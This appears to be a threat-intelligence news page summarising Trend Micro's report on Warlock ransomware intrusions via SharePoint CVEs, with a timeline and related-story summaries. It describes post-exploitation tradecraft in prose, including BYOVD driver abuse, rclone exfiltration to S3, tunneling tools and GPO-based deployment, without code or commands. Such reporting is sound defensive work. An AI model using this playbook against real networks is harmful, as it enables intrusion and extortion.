Warlock Ransomware Expands SharePoint Intrusions With Stealthier Post-Exploitation
Warlock ransomware operators have continued exploiting unpatched Microsoft SharePoint servers, but recent intrusions show a more mature post-exploitation playbook focused on persistence, lateral movement, and evasion after initial access. Trend Micro reported the group is now using a bring your own vulnerable driver (BYOVD) technique involving the Nsec driver, alongside tools such as TightVNC and the Yuze reverse proxy, to move more quietly across victim networks and reduce the chance of detection. The activity has affected organizations in the technology, manufacturing, and government sectors, with observed victims in the U.S., Germany, and Russia.
Incident details show the operators escalating to full domain compromise by abusing credentials, resetting the built-in Administrator account, and adding users to the Domain Administrators group. They used PsExec, PowerShell Remoting, MSI-based deployment of TightVNC, and RDP-enabling utilities to maintain remote access and spread laterally, while web shells, tunneling, and other remote-control mechanisms supported persistence and command-and-control. The reporting indicates Warlock has kept its SharePoint exploitation path consistent, but has significantly strengthened the actions that follow compromise, giving defenders a clearer set of behaviors to hunt for beyond the initial server exploit.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Trend Micro publishes analysis of Warlock’s enhanced tradecraft
Trend Micro disclosed details of the January 2026 intrusion, describing Warlock’s improved post-exploitation methods, expanded toolset, and use of stealthy tunneling and BYOVD techniques.
Ransomware execution drops lockdatareadme.txt note
The attack’s impact phase culminated in ransomware execution across the environment, after which a ransom note named lockdatareadme.txt was dropped on affected systems.
Warlock stages ransomware via SYSVOL, NETLOGON, and Group Policy
The operators placed ransomware components in SYSVOL and NETLOGON shares and configured Active Directory Group Policy startup scripts to execute the RunCryptor export from run.dll across the enterprise.
Data is exfiltrated to an attacker-controlled S3 bucket
Before ransomware deployment, the intruders used a renamed rclone binary, TrendFileSecurityCheck.exe, to steal data from the victim network and transfer it to an attacker-controlled Amazon S3 bucket.
Warlock uses BYOVD to disable security tools
The attackers abused the vulnerable NSecKrnl.sys driver in a bring-your-own-vulnerable-driver technique, using a renamed loader called TrendSecurity.exe to impair security products across the environment.
Attackers expand persistence, lateral movement, and covert access
During the intrusion, the operators used PsExec, PowerShell Remoting, TightVNC, Velociraptor, VS Code CLI tunneling, Cloudflare Tunnel, Yuze, and RDP patching to move laterally and maintain multiple redundant access and command-and-control channels.
Warlock compromises a victim network in a January 2026 intrusion
In January 2026, Warlock gained access to a victim environment and remained inside for about 15 days. The intrusion ultimately resulted in full domain-level control and preparation for enterprise-wide ransomware deployment.
Warlock continues exploiting unpatched SharePoint servers for initial access
Warlock, also tracked as Water Manaul, continued using known Internet-facing Microsoft SharePoint vulnerabilities for intrusion, including CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, and CVE-2025-53771. Researchers linked the group’s initial access activity to SharePoint worker processes.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
2 references tracked. Mallory keeps watching after this page renders.
See the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Warlock ransomware exploited SharePoint ToolShell and BYOVD to breach enterprises
Sophos reported that the ransomware group **Warlock Group**, tracked as **GOLD SALEM**, has been compromising enterprise networks and deploying **Warlock ransomware** since March 2025, with 60 publicly named victims through mid-September across North America, Europe, and South America. The operation used a Tor-based leak site, activity on underground forums, and possibly relationships with initial access brokers to support intrusions and extortion. Observed attacks began with exploitation of the **SharePoint ToolShell** exploit chain, followed by deployment of an **ASPX web shell** and a Golang-based WebSockets backdoor for persistence. Sophos said the actors stole credentials with **Mimikatz**, moved laterally with **PsExec** and **Impacket**, deployed ransomware through **Group Policy Objects**, and disabled endpoint protection using a **bring-your-own-vulnerable-driver** technique involving a vulnerable **Baidu Antivirus** driver; investigators also observed abuse of **Velociraptor** to establish a **Visual Studio Code** network tunnel. Microsoft tracks the activity as **Storm-2603** and assesses it with moderate confidence as China-based, though Sophos said it could not independently confirm that attribution.
May 25, 2026
Warlock Ransomware Attacks US Firms via SharePoint Zero-Day Linked to Chinese CamoFei APT
Warlock ransomware was deployed against US firms through the exploitation of a zero-day vulnerability in Microsoft SharePoint, identified as CVE-2025-53770. The attacks have been attributed to the China-based CamoFei APT group, with evidence indicating that the threat actor leveraged the ToolShell exploit to gain initial access and deploy both Warlock and LockBit ransomware payloads. The campaign is notable for its use of DLL sideloading and a custom command and control framework referred to as `ak47c2`, as well as the bundling of multiple ransomware payloads in a single attack. Security researchers have traced the origins of the Warlock ransomware to activity dating back to 2019, suggesting that the group behind it is not new but has evolved its tactics. The operation stands out because, unlike most ransomware campaigns typically associated with Russian actors, Warlock is linked to Chinese threat groups, including Budworm (APT27), Sheathminer (APT31), and Storm-2603. The attacks highlight a growing trend of Chinese APTs engaging in financially motivated ransomware operations targeting Western organizations.
Mar 21, 2026
China-Linked Hackers Exploit SharePoint ToolShell Flaws to Breach Governments and Telecoms
Microsoft disclosed multiple on-premises SharePoint Server vulnerabilities, including remote code execution flaws `CVE-2025-49701` and `CVE-2025-49704` and spoofing flaw `CVE-2025-49706`, as defenders responded to active exploitation. Microsoft said it was working to disrupt attacks targeting exposed SharePoint environments, while the Canadian Centre for Cyber Security issued threat-detection guidance to help organizations identify compromise tied to the SharePoint vulnerabilities. Subsequent reporting tied the broader **ToolShell** exploitation chain, including `CVE-2025-53770`, to China-linked operators that breached a Middle Eastern telecom provider, government departments in Africa, government agencies in South America, and a U.S. university. Investigators said the intrusions used malware and tooling including **Zingdoor**, **ShadowPad**, **KrustyLoader**, and **Sliver**, alongside credential-dumping, proxying, DLL sideloading, and persistence techniques, indicating a stealthy espionage-focused campaign that expanded beyond initial public understanding of the SharePoint attacks.
May 25, 2026